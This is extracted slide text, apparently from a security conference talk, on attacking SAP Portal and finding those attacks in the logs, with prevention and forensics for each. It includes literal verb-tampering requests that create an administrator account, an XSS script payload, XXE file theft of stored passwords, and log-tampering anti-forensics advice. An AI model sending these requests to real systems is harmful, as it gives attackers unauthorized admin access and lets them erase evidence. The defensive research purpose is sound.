  • 30.   •  Create  a  new  user  ITWEB:ITWEB     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB       •       Add  the  user  ITWEB  to  the  group  Administrators     HEAD  /ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators       Works  when  UME  uses  JAVA  database       30   Verb  Tampering:  AYack    
  • 31. •     Install  SAP  Notes  1503579,  1616259     •     Install  other  SAP  Notes  about  Verb  Tampering       •     Scan  applica8ons  with  ERPScan  WEB.XML  checker     •     Disable  the  applica8ons  that  are  not  necessary     31   Verb  Tampering:  Preven/on  
  • 32. [Apr  3,  2013  1:23:59  AM      ]  -­‐  192.168.192.14  :   GET  /ctc/ConfigServlet  HTTP/1.1  401  1790   [Apr  3,  2013  1:30:01  AM      ]  -­‐  192.168.192.14  :   HEAD  /ctc/ConfigServlet? param=com.sap.ctc.u8l.UserConfig;CREATEUSER;U SERNAME=ITWEB,PASSWORD=ITWEB  HTTP/1.0   200  0     32   Verb  Tampering:  Forensics  
  • 34. #1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/ Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl: 3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: uniquename=[hacker]# #1.5#000C29C2603300790000003B000008700004D974E7CD3828#1364996035234#/System/Security/ Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e26]#n/ a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl: 3]_22##0#0#Warning#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USERACCOUNT.CREATE | UACC.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: userid=[USER.PRIVATE_DATASOURCE.un:hacker]# #1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/ J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/ a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl: 3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE- Engine#guests# hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm   34   Invoker  Servlet:  Forensics  (user  crea/on)  
  • 36. • Update to the latest patch 1467771, 1445998 • “EnableInvokerServletGlobally” must be “false” • Check all WEB.XML files with ERPScan WEBXML checker 36   Invoker  servlet:  Preven/on  
  • 37.   •     Overwrite  log  file  with  trash  requests   •     Disable  logs  (need  server  restart)     •     Delete  logs  (not  so  easy)           *  There  should  be  a  separate  place  for  logs  to  prevent  modifica4ons  and  find   those  types  of  a>acks     37   An/-­‐forensics  for  simple  aYacks  
  • 38.   •       CSRF  in  Webdynpro  JAVA   •       XXE  in  Portal   •       Malicious  upload  in  Portal     *  They  all  need  addi4onal  analysis,  like  enabling   POST  data  logging  or  indirect  signs   38   Advanced  aYacks  
  • 39. •       Webdynpro  unauthorized  modifica8ons     •       For  example:   -  somebody  steals  an  account  using  XSS/CSRF/Sniffing   -  then  tries  to  modify  the  severity  level  of  logs   39   Advanced  aYacks:  webdynpro  JAVA  
  • 41. •  No  traces  of  change  in  default  log  files   clusterserver0logsystemhttpaccessresponses.log •  Webdynpro  sends  all  data  by  POST,  and  we  only  see  GET  URLs  in   responses.log     •  But  some8mes  we  can  find  informa8on  by  indirect  signs   [Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET / webdynpro/resources/sap.com/ tc~lm~webadmin~log_config~wd/Components/ com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110 •  Client  loaded  images  from  server  during  some  changes   41   Advanced  aYacks:  webdynpro  JAVA  
  • 42. •  Most  ac8ons  have  icons     •  They  have  to  be  loaded  from  the  server     •  Usually,  legi8mate  users  have  them  all  in  cache   •  AJackers  usually  don’t  have  them,  so  they  make  requests  to   the  server   •  That’s  how  we  can  iden8fy  poten8ally  malicious  ac8ons   •  But  there  should  be  correla8on  with  a  real  user’s  ac8vity   •  False  posi8ves  are  possible:   -  New  legi8mate  user     -  Old  user  clears  cache   -  Other   42   webdynpro  JAVA:  Forensics  
  • 43. •       Injec8on  of  malicious  requests  into  XML  packets   •       Can  lead  to  unauthorized  file  read,  DoS,  SSRF     •       There  is  an  XXE  vulnerability  in  SAP  Portal   •       Can  be  exploited  by  modifica8on  of  POST  request   •       It  is  possible  to  read  any  file  from  OS  and  much  more   43   XXE  in  Portal:  Details  
  • 44. 44   XXE  in  Portal:  AYack  
  • 45. 45   XXE  in  Portal:  Details  
  • 46. 46   XXE  in  Portal:  AYack  
  • 47. •  We can read any file •  Including config with passwords •  The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: •  usrsap<SID>SYSglobalsecuritydata SecStore.properties 47   XXE  in  Portal:  Result    
  • 48. •   Install  SAP  note  1619539   •   Restrict  read  access  to  files  SecStore.proper9es  and   SecStore.key   48   XXE  in  Portal:  Preven/on  
  • 50. XXE  in  Portal:  Forensics   •  The only one way to get HTTP POST request values is to enable HTTP Trace. •  Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable. -  For 6.4 and 7.0 SP 12 and lower: o  On Dispatcher /j2ee/cluster/dispatcher/log/ defaultTrace.trc o  On Server j2eeclusterserver0logsystemhttpaccessresponses.0.trc -  For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/ req_resp.trc •  And then you need to manually analyze all requests if there are any XXE attacks. 50  
  • 51. 51   Malicious  file  upload:  AYack   •  Knowledge management allows to upload to the server different types of files that can store malicious content •  Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user •  For example, it can be an HTML file with JavaScript that steals cookies
  • 53. 53   Malicious  file  upload:  AYack  
  • 54. Malicious  file  upload:  Forensics   •  [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/ HtmlbEvent/prtroot/pcd!3aportal_content! 2fspecialist!2fcontentmanager!2fContentManager! 2fcom.sap.km.ContentManager! 2fcom.sap.km.ContentExplorer! 2fcom.sap.km.ContentDocExplorer! 2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968 •  [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/ html.gif HTTP/1.1 200 165 •  *Again, images can help us 54  
  • 55. 55   Malicious  file  upload:  Preven/on   •  Enable  File  Extension  and  Size  Filter.   -  System  Administra9on  →  System  Configura9on  →  Content  Management  →     Repository  →  Filters  →  Show  Advanced  Op9ons  →  File  Extension  and  Size   Filter     -  you  must  select  either  the  All  repositories  parameter,  or  at  least  one   repository  from  the  repository  list  in  the  Repositories  parameter.  Otherwise,   the  filter  is  not  created.   •  Enable  Malicious  Script  Filter.   -  System  Administra9on  →  System  Configura9on  →  Content  Management  →     Repository  →  Filters  →  Show  Advanced  Op9ons  →  Malicious  Script  Filter     -  the  filter  also  detects  executable  scripts  in  files  that  are  being  modified  and   encodes  them  when  they  are  saved   o  enable  Forbidden  Scripts.  Comma-­‐separated  list  of  banned  script  tags   that  will  be  encoded  when  the  filter  is  applied.   o  enable  the  Send  E-­‐Mail  to  Administrator  op/on.  
  • 56. 56   Filtering  EPCF  in  XSS     •  EPCF  provides  a  JavaScript  API  for  client-­‐side  communica8on   between  the  Portal  components  and  the  Portal  core  framework   •  EPCM  (Enterprise  Portal  Client  Manager)   •  iViews  can  access  the  EPCM  object  from  every  page   •  Every  iView  contains  the  EPCM  object   •  For  example,  EPCF  is  used  for  tranmit  user  data  buffer  for   iViews   •  <SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects“,"person");</SCRIPT>  
  • 57. 57   Advanced  aYacks:  An/-­‐Forensics   •  If  all  trace  is  enabled,  it  can  downgrade  speed   •  It  can  also  occupy  all  the  storage  volume   •  If  an  aJacker  want  to  spam  logs  with  trash  values,  he  can  do  it   much  faster  than  just  with  GET  logs  
  • 58. 58   Securing  SAP  Portal   •  Patching •  Secure configuration •  Enabling HTTP Trace with masking •  Malicious script filter •  Log archiving •  Additional place for log storage •  Correlation of security events
  • 59. And  one  more  thing:     •  Portal  has  connec8ons  with  a  lot  of  systems  in  corporate  LAN   •  Using  SSRF,  aJackers  can  get  access  to  these  systems     59   Portal  post-­‐exploita/on  
  • 60. HTTP  Server    Corporate   network   Direct  aJack      GET  /vuln.jsp     SSRF  AJack     SSRF  AJack     Get  /vuln.jst     A   B   60   SSRF  aYacks  
  • 61.   hJp://erpscan.com/wp-­‐content/uploads/2012/08/SSRF-­‐vs-­‐Businness-­‐cri8cal-­‐applica8ons-­‐whitepaper.pdf   61   Gopher  uri  scheme   Using  gopher://  uri  scheme,  it  is  possible  to  send  TCP   packets   •   Exploit  OS  vulnerabili8es   •   Exploit  old  SAP  applica/on  vulnerabili/es     •   Bypass  SAP  security  restric8ons   •   Exploit  vulnerabili8es  in  local  services       More  info  in  our  BH2012  presenta8on:   SSRF  vs.  Business  Cri9cal  Applica9ons  
  • 62. It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure   SAP  Guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   Segrega/on  of  Du/es   62   Conclusion  
  • 63. Future  work   •  I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations: •  May 21 – Training at AusCert (Gold Coast, Australia) •  June 5-6 – Presentation at RSA (Marina Bay Sands, Singapore) •  September 10-12 – BlackHat Trainings (Istanbul, Turkey) 63